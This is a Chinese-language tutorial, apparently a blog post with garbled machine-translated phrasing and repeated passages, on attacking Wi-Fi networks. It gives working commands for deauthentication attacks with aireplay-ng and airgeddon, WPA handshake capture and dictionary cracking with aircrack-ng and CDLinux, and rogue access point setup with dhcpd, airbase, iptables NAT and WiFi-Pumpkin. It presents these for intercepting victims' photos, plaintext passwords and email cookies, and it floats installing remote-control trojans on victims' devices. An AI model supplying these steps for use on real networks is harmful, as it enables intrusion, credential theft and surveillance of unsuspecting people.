如何启动u盘?cdlinux (如何启动u盘?安装系统) 1.环境准备:1.软件:

使用无线爆破kali和DClinux,DOS使用Kali中的airgeddon。kali作为WIFI钓鱼基础平台,kali集成了许多开源黑客工具,便于学习。

Kali: https://www.kali.org/downloads/

CDlinux: http://cdlinux.net/

CDLinux可安装在U盘中使用,安装教程可自行安装百度。

2.硬件:

一块8812AU支持802的无线网卡.11AC无线协议。AWUS036ACH该网卡可穿越6堵承重墙100米信号满格。这是2017年出来的,当时的驱动都不太成熟所以踩了很多坑。

AWUS036ACH网卡驱动:https://github.com/gnab/rtl8812au

解压后操作以下命令:

makesudo make installmodprobe 8812au

更新

apt update apt install realtek-rtl88xxau-dkms

一开始没有网卡就用下面的U盘随身携带WiFi U盘功能也很强大。

然而,我认为普通网卡更稳定,比如8187无线网卡(有各种品牌的宝藏可以使用)。

然而,我认为普通网卡更稳定,比如8187无线网卡(有各种品牌的宝藏可以使用)。

8187无线网卡的优势

1.首先,无论是真机还是虚拟机,都可以直接识别,无需打驱动。

2.信号非常稳定。

3.对WiFi-pumpkin(钓鱼平台)的支持也很好。

最后确保kali或CDlinux可以识别无线网卡

二、无线爆破

无线爆破非常适合实战。我第一次独立做渗透测试是通过无线爆破进入用户网络(当时蹲在用户门外的亭子里。。。)用户内网一般都防护比较脆弱,进去以后可以绕过大多数安全防护从而直接攻击目标系统。

一、爆破方法一用kali爆破

用kali爆破的好处是不需要安装CDLinux而且支持的网卡种类很多(比如8812)AU),问题是需要输入一些命令,并安装一些网卡驱动程序。

下面通过kali无线密码爆破:

步骤:修改网卡模式-同时抓包DOS抓住握手包——暴力破解抓住的握手包。

iwconfig ///查看网卡

ifconfig wlan0 down ///禁用网卡

iwconfig wlan0 mode monitor //修改到监听模式

ifconfig wlan0 up ///启用网卡

airmon-gn start wlan0 ///打开监控模式

airodump-ng mon0 //抓包,只能看。

airodump-ng -c 1 -w 0914 mon0 ///抓1信道保存到0914文件

aireplay-ng-0 10 -a BSSIDmac地址 -c 客户端mac地址 mon0 ///同时抓包客户端dos攻击使其重新认证,抓住握手包

aircrack-ng -w /root/字典.lst 0914*.cap ///回车后,选择握手包进行暴力破解

破解成功

二、爆破方法二用CDlinux爆破

使用CDLinux其优点是建面化,整个过程不需要点击命令。CDLinux可以在U盘之间使用,便于携带,只需从U盘启动即可。CDLinux可安装在U盘之间,便于携带,只需从U盘启动即可。CDLinux对大多数免驱无线网卡都有很好的支持,但如果需要安装驱动器,则要复杂得多。

准备好CDLinux之后,首先收集无线信号,如下图所示。

收集的信息越多,爆破的成功率就越高。我们在这里选择****这个无线信号爆破了。

接下来,工具将自动获取握手包信息,如下图所示,大约需要几分钟。

拿到握手包后,密码破解。

我们准备的社工库生成的密码字典需要加载爆破。

选择字典。

以下是爆破,这个过程是基于之前的准备和运气,运气好,爆破成功! 如下图所示,WPA KEY部分是无线密码。

暴力破解不是每次都可以成功的,这得看运气!除了找一些更好的字典,收集一些社工字典更有效。三.无线DOS

无线DOS前面介绍无线爆破时,提到通过DOS打掉无线客户端,重新发送认证包,获得握手包。DOS也可用于在建立无线基站时通过对方的无线DOS然后建立无线基站,实现流量控制。

1.Airgeddon的使用

下载工具

https://github.com/v1s1t0r1sh3r3/airgeddon

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

bash airgeddon.sh

首先,修改网卡模式:监控模式,否则会提示以下内容:

选择网卡:2无线网卡

然后出现以下选项:

选择4通常是弹出附近的无线网。

ctrl c 停止嗅探,列出无线

选择36,要攻击的无线信号

选择攻击类型

开始攻击

然后无线就掉了

四、无线钓鱼

无线钓鱼利用思路:可通过钓鱼直接截获流量,还原图片、明文密码等,此外,还可以通过搭建钓鱼网站诱导对方登录认证获取个人信息。APP诱导对方安装带有远程控制木马的程序。

1.手工无线钓鱼

环境:kali2.0 360随身WiFi U盘

目标:建立无线钓鱼WiFi

步骤:配置DHCP配置文件-设置网卡模式-启动无线热点-建立虚拟网卡-打开IP转发-启动DHCP服务-设置nat。

1、配置DHCPD服务:修改/etc/dhcp/dhcpd.conf 添加以下代码:

authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0{option routers 10.0.0.1;option subnet-mask 255.255.255.0;option domain-name-servers 10.0.0.1;range 10.0.0.10 10.0.0.100;}

然后保存

2、设置网卡模式,需要插入无线网卡USB口并映射到kali虚拟机。网卡映射如下图所示wlan0

设置网卡模式:三个命令关闭无线网卡,设置为监控模式,启动网卡。网卡映射如下图所示wlan0

设置网卡模式:三个命令关闭无线网卡,设置为监控模式,启动网卡。

然后是使用airmon-ng工具启动无线网卡,主要是为下一步建立无线网站。

3.建立无线网站:

此时,无线网站已经建立,但客户端无法连接WiFi,因为DHCP服务还没有启动。

4、建立at0虚拟网卡:

我们将使用虚拟网卡at0.将热点流量转移到虚拟网卡上

此时,由于之前的窗口启动,需要打开另一个命令窗口WiFi它被用来监控所有的联系WiFi的客户端

虚拟网卡的基本配置,并将路由指向虚拟网卡

5、打开IP转发

顾名思义,就是让kali可以像路由器一样路由。

6、打开DHCP服务

其中/var/run/dhcpd.pid这是本次建立的文件。让我们顺便看看

开启服务

连接WiFi,可以获取到IP地址,和网关也通:

可以连接自然也不需要追究什么废话,时间很宝贵。

如果拔出网卡,因为硬件变化,必须重启kali重用网卡。硬重启

7、nat设置

前面只能连接WiFi了,但通过kali搭建的WiFi不能上网,所以小鱼不会用,所以在kali地址转换设置在系统中NAT,因为我们打开了前面的第五部分IP所以现在转发kali已经是路由器了。

通过iptables,如此强大的功能,设置nat

特别注意大写的名字,一旦输错,就会报错,认为命令有问题。在这里,我不知道这个命令的意思。找杜娘:POSTROUTING代表原地址,我估计-A指所有,然后在互联网上转换为eth根据对路由的理解,0的地址也是如此,因为kali两张网卡eth0可以上网,而且at作为虚拟网卡,想要通过eth0上网也必须通过eth0接口地址SNAT转换原地址。

第二条命令:无线网卡发送到eth0接口。

这是指原始地址,应该是因为无线获得的IP地址就是这个网段,都是转换的,最大数据长度1356

测试结果:

到目前为止,我们通过手机测试,手机通过WiFi热点:Fishing可访问百度。

好了,剩下的自由发挥吧,是截取流量(获取明文密码)还是DNS、ARP或浏览客户端在线图片,建立钓鱼网站(欺骗用户泄露个人信息)BEEF都可以。

获取图片

微信获取我儿子的照片

启动抓包工具wirshack抓at0口数据流量:


可获得手机型号,163邮箱账号cookie等待(由于新版本的加密,密码可能无法获得)。

注意:

关闭虚拟机,拔出无线网卡后,客户端无法再次启动IP地址

虚拟网卡重启后at0映射的wlan0导致虚拟网卡不可用,导致虚拟网卡不可用DHCP没有服务器地址,必须重新启动DHCP,重建虚拟网卡at0等步骤,还需要添加实测nat因为nat虚拟网卡的配置没有错。

2. WIFI-Pumpkin无线钓鱼

8812au可以支持WIFI-Pumpkin

可以接受cookie:

以下是过程描述:

安装:

下载https://github.com/P0cL4bs/WiFi-Pumpkin.git

解压后进入目录:

cd WiFi-Pumpkin

安装:

./installer.sh -–install

安装成功提示:

启动:

客户端连接WIFI(默认SSID:PumpAP):同样接受图片,dr if